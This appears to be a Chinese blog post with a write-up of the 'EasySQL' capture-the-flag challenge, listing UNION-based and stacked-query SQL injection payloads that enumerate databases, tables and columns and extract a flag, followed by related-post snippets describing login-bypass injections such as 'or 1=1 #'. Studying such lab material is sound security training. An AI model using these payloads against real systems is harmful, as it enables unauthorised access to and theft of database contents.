ctf(EasySQL)

已于 2022-10-07 21:58:35 修改
阅读量608 收藏 1
点赞数
文章标签: 数据库 sql
于 2022-10-07 21:56:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Glacier_Mount/article/details/127184534
版权
本文介绍了CTF挑战中涉及的EasySQL问题,通过记录SQL查询语句和堆叠查询来深入理解数据库操作。作者展示了如何通过POST参数进行SQL注入,包括尝试不同查询、爆破关键词过滤,并最终确定查询语句。通过payload '*,1'成功绕过过滤,获取数据。
摘要由CSDN通过智能技术生成

为了加深记忆我先记录一下SQL查询语句和堆叠查询语句

?wllm=1' order by 3--+
?wllm=-1' union select 1,2,3--+
?wllm=-1' union select 1,2,database()--+
?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+
?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+
?wllm= -1' union select 1,2,group_concat(id,flag) from test_tb--+ 

1;
1;show databases;
1;show tables;
1;show columns from 用来查询表中列名称;

好现在我们来看一下题目

最低0.47元/天 解锁文章
Glacier_Mount
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
buuctf easysql
hintll的博客
05-31 1635
[极客大挑战 2019]EasySQL 今天开始做buuctf上的web题 先看这题 打开链接后是一个登陆界面 首先想到的是弱口令试一下 admin admin admin 123 …… 都不行 然后考虑用bp爆破一下试试 但是这里有两个爆破的位置,所需要的时间比较长 所以应该不大概率的会是爆破 那么就只能考虑sql注入 对于有username和password的注入口 一般情况是在第一个username的地方注入然后将后面的password用#注释掉 先用普通的万能sql语句试一下 斜体样式 结果就直接
CTF-SQL注入
m0_74317362的博客
07-25 729
加有
Buuctf-Web-[极客大挑战 2019]EasySQL1 解题过程和思路
最新发布
gjpqwertty的博客
06-29 1100
SQL注入挑战题,目标是通过构造恶意的SQL语句来绕过身份验证或获取数据库中的敏感信息。
[G1CTF2021]easysql
qq_52718293的博客
05-23 230
通过后续测试发现有空格过滤,所以在所有有空格的位置都应将空格改成/**/(后续wp请自己修改) 打开f12也没什么特别 先判断是否有注入 输入单引号进行测试,sql语句报错,可能存在注入 判断是数字型注入还是字符型注入 在id处输入1’ 报错,表示不是字符型注入 在id处输入1 返回值正确,说明是数字注入 猜测查询列数 使用order by 语句猜测查询列数 猜测是不是10列 id=1’ order by 10–+ 发现返回值没区别,作为新手大胆猜测觉得这题与此无关 寻找占位 使用联合查询 union
[CTF][SUCTF2019]easysql
凉水的博客
10-22 360
解题思路 1 先尝试可能的注入点 单引号 双引号 数字 字母等等,看界面反应。 最终结果: from union 等关键字被过滤,flag字符串也被过滤。 可以使用堆叠注入。 输入字符串界面无反应,输入数字会返回,1,2,3等也会返回。 限制输入长度。 基本可以确定,是select … from xxx的句式。 但是会对最后一个字符做处理,如1,2,3,会返回1, 2,1 2 方向 把前面的规则理清了不太难,但是如何注入,很费脑筋。 因为from关键字被屏蔽,表名flag字符串也被屏蔽。同时又限制了输入长度
buuctfEasySQL
qq_38634097的博客
04-18 870
pyload:1’ or1=1 # (#的意思是把后面的注释掉,在这里是注释到闭合的‘,保证语句正常执行)页面报错,说明为字符型,在构造pyload时候,需要主要闭合‘。用or是因为1=1为真,则该语句执行结果为真。1、手工判断注入类型。输入1’判断注入类型,2、构造pyload。
CTF-Web-[极客大挑战2019]EasySQL
归子莫的博客
05-02 2662
CTF-Web-[极客大挑战2019]EasySQL 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Web类,[极客大挑战2019]EasySQL 打开题目的实例 思路 题目类型是Web类型的,而且...
DSO-NUS-CTF-Easysql:适用于DSO-NUS CTF 2021的Easysql上的撰写
03-11
标题 "DSO-NUS-CTF-Easysql:适用于DSO-NUS CTF 2021的Easysql上的撰写" 指的是一个针对2021年DSO-NUS网络安全挑战赛(DSO-NUS CTF)的比赛题目或解决方案,重点是围绕"Easysql"这个工具或技术进行的。CTF,即Capture...
CTF100题.docx
05-25
CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符...
CTF工具合集
04-09
CTF工具合集包括了CTF相关的各种工具,包括逆向,解密,WEB,密码学等等,相当有用,可以方便地准备各种CTF比赛
ctf拼图例题-puzzle
04-13
CTF(Capture The Flag)竞赛中,"puzzle"是一种常见的挑战类型,它涉及到解决各种谜题以获取关键信息或解密数据。本资源包包含了一组与CTF拼图相关的图片,很可能是参赛者需要解读的线索。每个图片可能代表一个...
简易SQL----Easy
09-07
简单化SQL增删改查,支持Access数据库。 可复制粘贴字段,方便写SQL语句。
easysql插件
02-24
eclipse的插件
CTF神器_ctf
09-23
【标题】:“CTF神器_ctf” 在网络安全领域,CTF(Capture The Flag)是一种流行的竞赛形式,参与者通过解决各种安全挑战来展示他们的技能。在这个压缩包“CTF神器_ctf”中,重点可能指向了一个名为“dirsearch”的...
BUUCTF-EasySQL
m0_47571887的博客
11-04 599
这是一道蛮基础的sql注入的题,打开题目 一个具有黑客色彩的登陆页面,emm,没有注册窗口,在用户名或密码处加个单引号发现报错。 判断是字符型注入,通过万能密码登陆注入进去, username=admin' or 1=1 --+&password=' 拿到flag ...
CTF-Web-Sql注入-[SUCTF 2019]EasySQL
weixin_42566218的博客
02-21 2076
BUUCTF-Web-Sql注入-[SUCTF 2019]EasySQL 题目链接:BUUCTF 类型:sql注入 知识点:堆叠注入、mysql异或、mysql服务器变量(sql_mode)、后端代码推测 解题方法:两种方法 这道题考的是一道堆叠注入,题目涉及到了后端代码推测和mysql的部分基础知识,代码推测意思就是构造前端输入根据后端回显信息去推测后端用到的是什么sql语句,这对我这种CTF小白来说根本没什么经验,所以咱就是说根本做不出来!,只能求助官方大大的wp才能勉强做出来 解题过程 方法1
[SWPUCTF 2021 新生赛]easy_sql
zoixsoadji的博客
05-06 1435
感谢平台Nssctf 进入题目,说是让我们输入点东西,f12打开源代码,发现要求我们传的参数是wllm 那么我们就传入一个wllm=1,发现有注入点 先查看有几个库:?wllm=-1' order by 1--+ ?wllm=-1' order by 2--+ ?wllm=-1' order by 3--+ 接下来查回显:?wllm=union select 1,2,3--+ 看到回显位是2,3,查库名:?wllm=-1' union select 1,2,databas.
BUUCTF【Web】EasySQL
qq_70434663的博客
02-28 1079
如果我们传入的username为1' or 1=1 #,随便输入password。既然知道了是单引号闭合,现在就尝试注入,首先了解一下万能用户名和密码。会用到以下的句型,如果用户与密码匹配正确则返回真值通过验证成功登录。因为1=1恒为真,所以SQL语句返回真值,成功绕过验证得到flag。所以尝试闭合方法,随便输入1、1'、1''密码随便输入即可。但输入1'时会报错,所以语句为单引号闭合。当输入1和1''时会出现以下的提示,××,××,××为两张表查询字段的数量。一般的,库验证登录注册。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值